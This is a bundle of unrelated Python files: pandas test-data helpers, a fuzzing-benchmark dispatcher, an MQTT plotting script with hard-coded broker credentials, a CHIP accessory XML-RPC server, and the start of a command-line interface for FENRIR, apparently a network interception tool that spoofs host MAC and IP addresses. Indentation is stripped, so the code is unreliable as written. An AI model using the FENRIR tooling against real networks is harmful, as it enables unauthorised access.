def makeFloatIndex(k=10, name=None):
base_idx = makeNumericIndex(k, name=name, dtype="float64")
return Float64Index(base_idx)
def makeDateIndex(k: int = 10, freq="B", name=None, **kwargs) -> DatetimeIndex:
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name, **kwargs)
def makeTimedeltaIndex(k: int = 10, freq="D", name=None, **kwargs) -> TimedeltaIndex:
return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k: int = 10, name=None, **kwargs) -> PeriodIndex:
dt = datetime(2000, 1, 1)
return pd.period_range(start=dt, periods=k, freq="B", name=name, **kwargs)
def makeMultiIndex(k=10, names=None, **kwargs):
return MultiIndex.from_product((("foo", "bar"), (1, 2)), names=names, **kwargs)
_names = [
"Alice",
"Bob",
"Charlie",
"Dan",
"Edith",
"Frank",
"George",
"Hannah",
"Ingrid",
"Jerry",
"Kevin",
"Laura",
"Michael",
"Norbert",
"Oliver",
"Patricia",
"Quinn",
"Ray",
"Sarah",
"Tim",
"Ursula",
"Victor",
"Wendy",
"Xavier",
"Yvonne",
"Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
"""
Make a DataFrame with a DatetimeIndex
Parameters
----------
start : str or Timestamp, default "2000-01-01"
The start of the index. Passed to date_range with `freq`.
end : str or Timestamp, default "2000-12-31"
The end of the index. Passed to date_range with `freq`.
freq : str or Freq
The frequency to use for the DatetimeIndex
seed : int, optional
The random state seed.
    Returns
    -------
    DataFrame
        A DataFrame with the following columns:
        * name : object dtype with string names
        * id : int dtype with Poisson-distributed integer values
        * x, y : float dtype
Examples
--------
>>> _make_timeseries()
id name x y
timestamp
2000-01-01 982 Frank 0.031261 0.986727
2000-01-02 1025 Edith -0.086358 -0.032920
2000-01-03 982 Edith 0.473177 0.298654
2000-01-04 1009 Sarah 0.534344 -0.750377
2000-01-05 963 Zelda -0.271573 0.054424
... ... ... ... ...
2000-12-27 980 Ingrid -0.132333 -0.422195
2000-12-28 972 Frank -0.376007 -0.298687
2000-12-29 1009 Ursula -0.865047 -0.503133
2000-12-30 1000 Hannah -0.063757 -0.507336
2000-12-31 972 Tim -0.869120 0.531685
"""
index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
n = len(index)
state = np.random.RandomState(seed)
columns = {
"name": state.choice(_names, size=n),
"id": state.poisson(1000, size=n),
"x": state.rand(n) * 2 - 1,
"y": state.rand(n) * 2 - 1,
}
df = DataFrame(columns, index=index, columns=sorted(columns))
if df.index[-1] == end:
df = df.iloc[:-1]
return df
def index_subclass_makers_generator():
make_index_funcs = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
makeMultiIndex,
]
yield from make_index_funcs
def all_timeseries_index_generator(k: int = 10) -> Iterable[Index]:
"""
Generator which can be iterated over to get instances of all the classes
which represent time-series.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs: list[Callable[..., Index]] = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
]
for make_index_func in make_index_funcs:
yield make_index_func(k=k)
# make series
def makeFloatSeries(name=None):
index = makeStringIndex(_N)
return Series(np.random.randn(_N), index=index, name=name)
def makeStringSeries(name=None):
index = makeStringIndex(_N)
return Series(np.random.randn(_N), index=index, name=name)
def makeObjectSeries(name=None):
data = makeStringIndex(_N)
data = Index(data, dtype=object)
index = makeStringIndex(_N)
return Series(data, index=index, name=name)
def getSeriesData():
index = makeStringIndex(_N)
return {c: Series(np.random.randn(_N), index=index) for c in getCols(_K)}
def makeTimeSeries(nper=None, freq="B", name=None):
if nper is None:
nper = _N
return Series(
np.random.randn(nper), index=makeDateIndex(nper, freq=freq), name=name
)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = _N
return Series(np.random.randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
return {c: makeTimeSeries(nper, freq) for c in getCols(_K)}
def getPeriodData(nper=None):
return {c: makePeriodSeries(nper) for c in getCols(_K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame() -> DataFrame:
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(["a", "b", "c", "d", "e"])
data = {
"A": [0.0, 1.0, 2.0, 3.0, 4.0],
"B": [0.0, 1.0, 0.0, 1.0, 0.0],
"C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
"D": bdate_range("1/1/2009", periods=5),
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makeCustomIndex(
nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
"""
    Create an index/multiindex with given dimensions, levels, names, etc.
    nentries - number of entries in index
    nlevels - number of levels (> 1 produces multiindex)
prefix - a string prefix for labels
names - (Optional), bool or list of strings. if True will use default
names, if false will use no names, if a list is given, the name of
each level in the index will be taken from the list.
ndupe_l - (Optional), list of ints, the number of rows for which the
label will repeated at the corresponding level, you can specify just
the first few, the rest will use the default ndupe_l of 1.
len(ndupe_l) <= nlevels.
idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a datetime index.
if unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
    assert names is None or names is False or names is True or len(names) == nlevels
assert idx_type is None or (
idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singleton case uniform
if isinstance(names, str) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func_dict: dict[str, Callable[..., Index]] = {
"i": makeIntIndex,
"f": makeFloatIndex,
"s": makeStringIndex,
"u": makeUnicodeIndex,
"dt": makeDateIndex,
"td": makeTimedeltaIndex,
"p": makePeriodIndex,
}
idx_func = idx_func_dict.get(idx_type)
if idx_func:
idx = idx_func(nentries)
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError(
f"{repr(idx_type)} is not a legal value for `idx_type`, "
"use 'i'/'f'/'s'/'u'/'dt'/'p'/'td'."
)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all(x > 0 for x in ndupe_l)
list_of_lists = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
return [int(num) for num in numeric_tuple]
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
# Deprecated since version 3.9: collections.Counter now supports []. See PEP 585
# and Generic Alias Type.
cnt: Counter[str] = collections.Counter()
for j in range(div_factor):
label = f"{prefix}_l{i}_g{j}"
cnt[label] = ndupe_l[i]
# cute Counter trick
result = sorted(cnt.elements(), key=keyfunc)[:nentries]
list_of_lists.append(result)
tuples = list(zip(*list_of_lists))
# convert tuples to index
if nentries == 1:
# we have a single level of tuples, i.e. a regular Index
index = Index(tuples[0], name=names[0])
elif nlevels == 1:
name = None if names is None else names[0]
index = Index((x[0] for x in tuples), name=name)
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
def makeCustomDataframe(
nrows,
ncols,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Create a DataFrame using supplied parameters.
Parameters
----------
nrows, ncols - number of data rows/cols
    c_idx_names, r_idx_names - False/True/list of strings, yields no names,
        default names or uses the provided names for the levels of the
        corresponding index. You can provide a single string when
        c_idx_nlevels == 1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
data_gen_f - a function f(row,col) which return the data value
at that position, the default generator used yields values of the form
"RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding
index. The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of length
N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
nrows/ncol, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
have more control in conjunction with a custom `data_gen_f`
r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a timedelta index.
if unspecified, string labels will be generated.
Examples
--------
# 5 row, 3 columns, default names on both, single index on both axis
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
>> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated
# twice on first level, default names on both axis, single
# index on both axis
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
# 4-level multindex on rows with names provided, 2-level multindex
# on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FIH","FOH","FUM"],
c_idx_nlevels=2)
>> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or (
r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
)
assert c_idx_type is None or (
c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
)
columns = makeCustomIndex(
ncols,
nlevels=c_idx_nlevels,
prefix="C",
names=c_idx_names,
ndupe_l=c_ndupe_l,
idx_type=c_idx_type,
)
index = makeCustomIndex(
nrows,
nlevels=r_idx_nlevels,
prefix="R",
names=r_idx_names,
ndupe_l=r_ndupe_l,
idx_type=r_idx_type,
)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: f"R{r}C{c}"
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = round((1 - density) * nrows * ncols)
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingDataframe(density=0.9, random_state=None):
df = makeDataFrame()
i, j = _create_missing_idx(*df.shape, density=density, random_state=random_state)
df.values[i, j] = np.nan
return df
def test_parallel(num_threads=2, kwargs_list=None):
"""
Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
kwargs_list : list of dicts, optional
        A list of kwargs dicts, one per thread, merged into the original
        function kwargs for that thread.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image:
https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
has_kwargs_list = kwargs_list is not None
if has_kwargs_list:
assert len(kwargs_list) == num_threads
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
if has_kwargs_list:
update_kwargs = lambda i: dict(kwargs, **kwargs_list[i])
else:
update_kwargs = lambda i: kwargs
threads = []
for i in range(num_threads):
updated_kwargs = update_kwargs(i)
thread = threading.Thread(target=func, args=args, kwargs=updated_kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
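# Usage sketch for test_parallel (hypothetical test body):
#
#   @test_parallel(num_threads=4)
#   def _hammer_shared_state():
#       ...  # body runs concurrently in 4 threads
#
#   _hammer_shared_state()  # blocks until all threads join; return values are dropped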
class SubclassedSeries(Series):
_metadata = ["testattr", "name"]
@property
def _constructor(self):
return SubclassedSeries
@property
def _constructor_expanddim(self):
return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return SubclassedDataFrame
@property
def _constructor_sliced(self):
return SubclassedSeries
class SubclassedCategorical(Categorical):
@property
def _constructor(self):
return SubclassedCategorical
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""
Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
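# Usage sketch: build a NaN-skipping reducer from a plain reducer.
#   skipna_sum = _make_skipna_wrapper(np.sum)
#   skipna_sum(Series([1.0, np.nan, 2.0]))  # -> 3.0 (NaN rows dropped first)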
def convert_rows_list_to_csv_str(rows_list: list[str]):
"""
Convert list of CSV rows to single CSV-formatted string for current OS.
This method is used for creating expected value of to_csv() method.
Parameters
----------
rows_list : List[str]
Each element represents the row of csv.
Returns
-------
str
Expected output of to_csv() in current OS.
"""
sep = os.linesep
return sep.join(rows_list) + sep
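# Example (on a platform where os.linesep == "\n"):
#   convert_rows_list_to_csv_str(["a,b", "1,2"])  # -> "a,b\n1,2\n"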
def external_error_raised(expected_exception: type[Exception]) -> ContextManager:
"""
Helper function to mark pytest.raises that have an external error message.
Parameters
----------
expected_exception : Exception
Expected error to raise.
Returns
-------
Callable
Regular `pytest.raises` function with `match` equal to `None`.
"""
import pytest
return pytest.raises(expected_exception, match=None) # noqa: PDF010
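# Usage sketch (inside a test body):
#   with external_error_raised(ValueError):
#       raise ValueError("message owned by a third-party library")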
cython_table = pd.core.common._cython_table.items()
def get_cython_table_params(ndframe, func_names_and_expected):
"""
Combine frame, functions from com._cython_table
keys and expected result.
Parameters
----------
ndframe : DataFrame or Series
func_names_and_expected : Sequence of two items
The first item is a name of a NDFrame method ('sum', 'prod') etc.
The second item is the expected return value.
Returns
-------
list
List of three items (DataFrame, function, expected result)
"""
results = []
for func_name, expected in func_names_and_expected:
results.append((ndframe, func_name, expected))
results += [
(ndframe, func, expected)
for func, name in cython_table
if name == func_name
]
return results
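# Usage sketch (hypothetical expected value): one name fans out into the string
# case plus one case per matching cython-table callable:
#   get_cython_table_params(df, [("sum", 10)])
#   # -> [(df, "sum", 10), (df, np.sum, 10), ...]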
def get_op_from_name(op_name: str) -> Callable:
"""
The operator function for a given op name.
Parameters
----------
op_name : str
The op name, in form of "add" or "__add__".
Returns
-------
function
A function performing the operation.
"""
short_opname = op_name.strip("_")
try:
op = getattr(operator, short_opname)
except AttributeError:
# Assume it is the reverse operator
rop = getattr(operator, short_opname[1:])
op = lambda x, y: rop(y, x)
return op
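# Examples:
#   get_op_from_name("add")(1, 2)   # -> 3 (operator.add)
#   get_op_from_name("rsub")(1, 2)  # -> 1 (reversed: operator.sub(2, 1))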
# -----------------------------------------------------------------------------
# Indexing test helpers
def getitem(x):
return x
def setitem(x):
return x
def loc(x):
return x.loc
def iloc(x):
return x.iloc
def at(x):
return x.at
def iat(x):
return x.iat
|
dispatcher.py | #!/usr/bin/env python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Script to run on the dispatcher. Builds each benchmark with each fuzzing
configuration, spawns a runner VM for each benchmark-fuzzer combo, and then
records coverage data received from the runner VMs."""
import datetime
import multiprocessing
import os
import sys
import threading
import time
from typing import List
from common import experiment_path as exp_path
from common import experiment_utils
from common import logs
from common import yaml_utils
from database import models
from database import utils as db_utils
from experiment.build import builder
from experiment.measurer import measure_manager
from experiment import reporter
from experiment import scheduler
from experiment import stop_experiment
LOOP_WAIT_SECONDS = 5 * 60
# TODO(metzman): Convert more uses of os.path.join to exp_path.path.
def _get_config_path():
"""Return config directory."""
return exp_path.path(
experiment_utils.get_internal_experiment_config_relative_path())
def create_work_subdirs(subdirs: List[str]):
"""Create |subdirs| in work directory."""
for subdir in subdirs:
os.mkdir(os.path.join(experiment_utils.get_work_dir(), subdir))
def _initialize_experiment_in_db(experiment_config: dict):
"""Initializes |experiment| in the database by creating the experiment
entity."""
with db_utils.session_scope() as session:
experiment_exists = session.query(models.Experiment).filter(
models.Experiment.name == experiment_config['experiment']).first()
if experiment_exists:
raise Exception('Experiment already exists in database.')
db_utils.add_all([
db_utils.get_or_create(
models.Experiment,
name=experiment_config['experiment'],
git_hash=experiment_config['git_hash'],
private=experiment_config.get('private', True),
experiment_filestore=experiment_config['experiment_filestore'],
description=experiment_config['description']),
])
def _record_experiment_time_ended(experiment_name: str):
"""Record |experiment| end time in the database."""
with db_utils.session_scope() as session:
experiment = session.query(models.Experiment).filter(
models.Experiment.name == experiment_name).one()
experiment.time_ended = datetime.datetime.utcnow()
db_utils.add_all([experiment])
def _initialize_trials_in_db(trials: List[models.Trial]):
"""Initializes entities for each trial in the experiment."""
# TODO(metzman): Consider doing this without sqlalchemy. This can get
# slow with SQLalchemy (it's much worse with add_all).
db_utils.bulk_save(trials)
class Experiment: # pylint: disable=too-many-instance-attributes
"""Class representing an experiment."""
def __init__(self, experiment_config_filepath: str):
self.config = yaml_utils.read(experiment_config_filepath)
self.benchmarks = self.config['benchmarks']
self.fuzzers = self.config['fuzzers']
self.num_trials = self.config['trials']
self.experiment_name = self.config['experiment']
self.git_hash = self.config['git_hash']
self.preemptible = self.config.get('preemptible_runners')
def build_images_for_trials(fuzzers: List[str], benchmarks: List[str],
num_trials: int,
preemptible: bool) -> List[models.Trial]:
"""Builds the images needed to run |experiment| and returns a list of trials
that can be run for experiment. This is the number of trials specified in
experiment times each pair of fuzzer+benchmark that builds successfully."""
# This call will raise an exception if the images can't be built which will
# halt the experiment.
builder.build_base_images()
# Only build fuzzers for benchmarks whose measurers built successfully.
benchmarks = builder.build_all_measurers(benchmarks)
build_successes = builder.build_all_fuzzer_benchmarks(fuzzers, benchmarks)
experiment_name = experiment_utils.get_experiment_name()
trials = []
for fuzzer, benchmark in build_successes:
fuzzer_benchmark_trials = [
models.Trial(fuzzer=fuzzer,
experiment=experiment_name,
benchmark=benchmark,
preemptible=preemptible) for _ in range(num_trials)
]
trials.extend(fuzzer_benchmark_trials)
return trials
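# For example, 3 fuzzers and 2 benchmarks that all build successfully with
# num_trials=5 yield 3 * 2 * 5 = 30 Trial entities.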
def dispatcher_main():
"""Do the experiment and report results."""
logs.info('Starting experiment.')
# Set this here because we get failures if we do it in measurer for some
# reason.
multiprocessing.set_start_method('spawn')
db_utils.initialize()
if experiment_utils.is_local_experiment():
models.Base.metadata.create_all(db_utils.engine)
experiment_config_file_path = _get_config_path()
experiment = Experiment(experiment_config_file_path)
_initialize_experiment_in_db(experiment.config)
trials = build_images_for_trials(experiment.fuzzers, experiment.benchmarks,
experiment.num_trials,
experiment.preemptible)
_initialize_trials_in_db(trials)
create_work_subdirs(['experiment-folders', 'measurement-folders'])
    # Start measurer and scheduler in separate threads/processes.
scheduler_loop_thread = threading.Thread(target=scheduler.schedule_loop,
args=(experiment.config,))
scheduler_loop_thread.start()
measurer_main_process = multiprocessing.Process(
target=measure_manager.measure_main, args=(experiment.config,))
measurer_main_process.start()
is_complete = False
while True:
time.sleep(LOOP_WAIT_SECONDS)
if not scheduler_loop_thread.is_alive():
is_complete = not measurer_main_process.is_alive()
# Generate periodic output reports.
reporter.output_report(experiment.config,
in_progress=not is_complete,
coverage_report=is_complete)
if is_complete:
# Experiment is complete, bail out.
break
scheduler_loop_thread.join()
measurer_main_process.join()
_record_experiment_time_ended(experiment.experiment_name)
logs.info('Experiment ended.')
def main():
"""Do the experiment and report results."""
logs.initialize(default_extras={
'component': 'dispatcher',
})
try:
dispatcher_main()
except Exception as error:
logs.error('Error conducting experiment.')
raise error
experiment_config_file_path = os.path.join(_get_config_path(),
'experiment.yaml')
if experiment_utils.is_local_experiment():
return 0
if stop_experiment.stop_experiment(experiment_utils.get_experiment_name(),
experiment_config_file_path):
return 0
return 1
if __name__ == '__main__':
sys.exit(main())
|
mqtt_plotting.py | # 需要安装 matplotlib
# 参考命令:python3.6 -m pip install matplotlib
# 读取MQTT数据,动态绘制图表
# 代码编写:谢作如,2019.5.8
from pylab import *
import threading
import paho.mqtt.client as mqtt
import time,random
SERVER = "127.0.0.1" #MQTT服务器IP
CLIENT_ID = "79afcb3bdb44b7aa" #在SIoT上,CLIENT_ID可以留空
TOPIC = 'xzr/001' #“topic”为“项目名称/设备名称”
username='siot' #用户名
password='dfrobot' #密码
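# To feed test data, publish integers to the topic, e.g. with the mosquitto
# command-line client (assuming it is installed):
#   mosquitto_pub -h 127.0.0.1 -t "xzr/001" -u siot -P dfrobot -m 42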
class MqttClient:
client = mqtt.Client(CLIENT_ID)
def __init__(self, host, port):
self._host = host
self._port = port
self.client.on_connect = self._on_connect
self.client.on_message = self._on_message
def connect(self, username, password):
self.client.username_pw_set(username, password)
self.client.connect(self._host, self._port, 60)
def publish(self, topic, data):
self.client.publish(str(topic), str(data))
def loop(self, timeout=None):
thread = threading.Thread(target=self._loop, args=(timeout,))
# thread.setDaemon(True)
thread.start()
def _loop(self, timeout=None):
if not timeout:
self.client.loop_forever()
else:
self.client.loop(timeout)
def _on_connect(self, client, userdata, flags, rc):
print("\nConnected :" + str(rc))
client.subscribe(TOPIC)
def _on_message(self, client, userdata, msg):
print("\n收到Topic:" + str(msg.topic) + " Message:" + str(int(msg.payload)))
showplt(int(msg.payload)) #开始绘图
def showplt(val):
global x,y,i
grid(True)
plt.ion()
x.append(i)
y.append(val)
ax.plot(x,y,'b')
plt.pause(0.0001)
plt.show()
i +=1
if __name__ == '__main__':
global x,y,i,fig, ax
fig, ax= plt.subplots()
i=0
x=[]
y=[]
showplt(0)
client = MqttClient(SERVER, 1883)
client.connect(username,password)
client.loop()
|
accessories.py | #
# Copyright (c) 2021 Project CHIP Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import time
import threading
import sys
from random import randrange
from xmlrpc.server import SimpleXMLRPCServer
from xmlrpc.client import ServerProxy
IP = '127.0.0.1'
PORT = 9000
if sys.platform == 'linux':
IP = '10.10.10.5'
class AppsRegister:
_instance = None
__accessories = {}
def init(self):
self.__startXMLRPCServer()
def uninit(self):
self.__stopXMLRPCServer()
def add(self, name, accessory):
self.__accessories[name] = accessory
def remove(self, name):
self.__accessories.pop(name)
def removeAll(self):
self.__accessories = {}
def poll(self):
for accessory in self.__accessories.values():
status = accessory.poll()
if status is not None:
return status
return None
def kill(self, name):
accessory = self.__accessories[name]
if accessory:
accessory.kill()
def killAll(self):
for accessory in self.__accessories.values():
accessory.kill()
def start(self, name, discriminator):
accessory = self.__accessories[name]
if accessory:
return accessory.start(discriminator)
return False
def stop(self, name):
accessory = self.__accessories[name]
if accessory:
return accessory.stop()
return False
def reboot(self, name, discriminator):
accessory = self.__accessories[name]
if accessory:
return accessory.stop() and accessory.start(discriminator)
return False
def ping(self):
return True
def __startXMLRPCServer(self):
self.server = SimpleXMLRPCServer((IP, PORT))
self.server.register_function(self.start, 'start')
self.server.register_function(self.stop, 'stop')
self.server.register_function(self.reboot, 'reboot')
self.server.register_function(self.ping, 'ping')
self.server_thread = threading.Thread(target=self.__handle_request)
self.server_thread.start()
def __handle_request(self):
self.__should_handle_requests = True
while self.__should_handle_requests:
self.server.handle_request()
def __stopXMLRPCServer(self):
self.__should_handle_requests = False
# handle_request will wait until it receives a message, so let's send a ping to the server
client = ServerProxy('http://' + IP + ':' +
str(PORT) + '/', allow_none=True)
client.ping()
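# Usage sketch: a remote test controller could drive the registered accessories
# through the XML-RPC endpoint above (app name/discriminator are illustrative):
#   proxy = ServerProxy('http://10.10.10.5:9000/', allow_none=True)
#   proxy.start('lighting-app', '3840')
#   proxy.reboot('lighting-app', '3840')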
|
Interface.py | # coding=utf-8
from cmd2 import Cmd
from binascii import hexlify, unhexlify
from FENRIR2 import *
import threading
class Interface(Cmd):
FENRIR = FENRIR()
FenrirThread = None
stop_event = None
promptBase = "FENRIR"
prompt = "\n\033[1m\033[31m" + promptBase + " >\033[0m "
intro = """\n\033[1m
,a8b
,,od8 8
d8' 8b
d8'ba aP'
o8' aP'
YaaaP' ba
\033[31mFENRIR\033[0m\033[1m Y8' 88
,8\" `P
,d8P' ba
ooood8888888P\"\"\"' P'
,od 8
,dP o88o o'
,dP 8 8
,d' oo 8 ,8
$ d$\"8 8 Y Y o 8
d d d8 od \"\"boooaaaaoob d\"\"8 8
$ 8 d ood'-I 8 b 8 '8 b
$ $ 8 8 d d8 `b d '8 b
$ $ 8 b Y d8 8 ,P '8 b
`$$ Yb b 8b 8b 8 8, '8 o,
`Y b 8o $$ d b b $o
8 '$ 8$,,$\" $ $o '$o$$
$o$$P\" $$o$
\033[0m"""
def __init__(self):
Cmd.__init__(self)
### TOOLBOX ###
def hexToStr(self, hexstr):
string = hexlify(hexstr).decode('ascii')
return string[:2] + ":" + string[2:4] + ":" + string[4:6] + ":" + string[6:8] + ":" + string[8:10] + ":" + string[-2:]
def strToHex(self, string):
hexes = string.split(":")
hexstr = ''.join(hexes).encode("ascii")
return unhexlify(hexstr)
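    # e.g. hexToStr(b'\xaa\xbb\xcc\xdd\xee\xff') -> "aa:bb:cc:dd:ee:ff"
    #      strToHex("aa:bb:cc:dd:ee:ff")         -> b'\xaa\xbb\xcc\xdd\xee\xff'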
def changeRunningState(self, state):
if state == True:
self.prompt = "\n\033[1m\033[32m" + self.promptBase + " >\033[0m "
self.FENRIR.isRunning = True
elif state == False:
self.prompt = "\n\033[1m\033[31m" + self.promptBase + " >\033[0m "
self.FENRIR.isRunning = False
def do_create_virtual_tap(self,s):
self.FENRIR.createTap()
def help_create_virtual_tap(self):
print("Creates the virtual tap for FENRIR core module")
def do_destroy_virtual_tap(self,s):
self.FENRIR.downTap()
def help_destroy_virtual_tap(self):
print("Deletes the virtual tap for FENRIR core module")
def do_show(self,argString):
args = argString.split()
if len(args) != 1:
print("*** Invalid number of arguments")
self.help_show()
else:
if args[0] == "tap" and self.FENRIR.tap != None:
print("tap :")
print("Address ===> " + self.FENRIR.tap.addr)
print("MAC ===> " + self.hexToStr(self.FENRIR.tap.hwaddr))
print("mtu ===> " + str(self.FENRIR.tap.mtu))
elif args[0] == "host_ip" and self.FENRIR.hostip != None:
print("host_ip ===> " + self.FENRIR.hostip)
elif args[0] == "host_mac" and self.FENRIR.hostmac != None:
print("host_mac ===> " + self.hexToStr(self.FENRIR.hostmac))
elif args[0] == "rules":
if self.FENRIR.FenrirFangs.ruleCount == 0:
print("No rule added (yet)")
else:
num = 0
for rule in self.FENRIR.FenrirFangs.userRules:
num += 1
print("Rule " + str(num) +" : \n\tport = " + str(rule.dst_port) + "\n\ttype = " + rule.type + "\n\tproto = " + rule.proto)
elif args[0] == "netIface":
print("netIface ===> " + self.FENRIR.switchIface)
elif args[0] == "hostIface":
print("hostIface ===> " + self.FENRIR.LhostIface)
elif args[0] == "all":
self.do_show("tap")
self.do_show("host_ip")
self.do_show("host_mac")
self.do_show("hostIface")
self.do_show("netIface")
self.do_show("rules")
def help_show(self):
print("USAGE : show <attribute>")
def complete_show(self, match, line, bindex, eindex):
COMPLETION_ARRAY = ('tap', 'host_ip', 'host_mac', 'rules', 'hostIface ', 'netIface ', 'all')
return [i for i in COMPLETION_ARRAY if i.startswith(match)]
def do_set(self, argString):
args = argString.split()
if len(args) != 2:
print("*** Invalid number of arguments")
self.help_set()
else:
if args[0] == "debug":
Cmd.do_set(self, argString)
elif args[0] == "host_mac":
attrValue = self.strToHex(args[1])
else:
attrValue = args[1]
if self.FENRIR.setAttribute(args[0], attrValue) == False:
print("*** Invalid argument")
self.help_set()
else:
print(args[0] + " ===> " + args[1])
def help_set(self):
print("USAGE : set <attribute> <value>")
print("Attributes = host_ip, host_mac, netIface, hostIface, verbosity <0-3>")
def complete_set(self, match, line, bindex, eindex):
COMPLETION_ARRAY = ('host_ip ', 'host_mac ', 'verbosity ', 'netIface ', 'hostIface ')
if bindex == 4:
return [i for i in COMPLETION_ARRAY if i.startswith(match)]
else:
return ('')
def do_stats(self,s):
if self.FENRIR.isRunning == True:
print("Packet(s) processed by FENRIR : " + str(self.FENRIR.pktsCount))
def do_add_reverse_rule(self, argString):
args = argString.split()
if len(args) != 3:
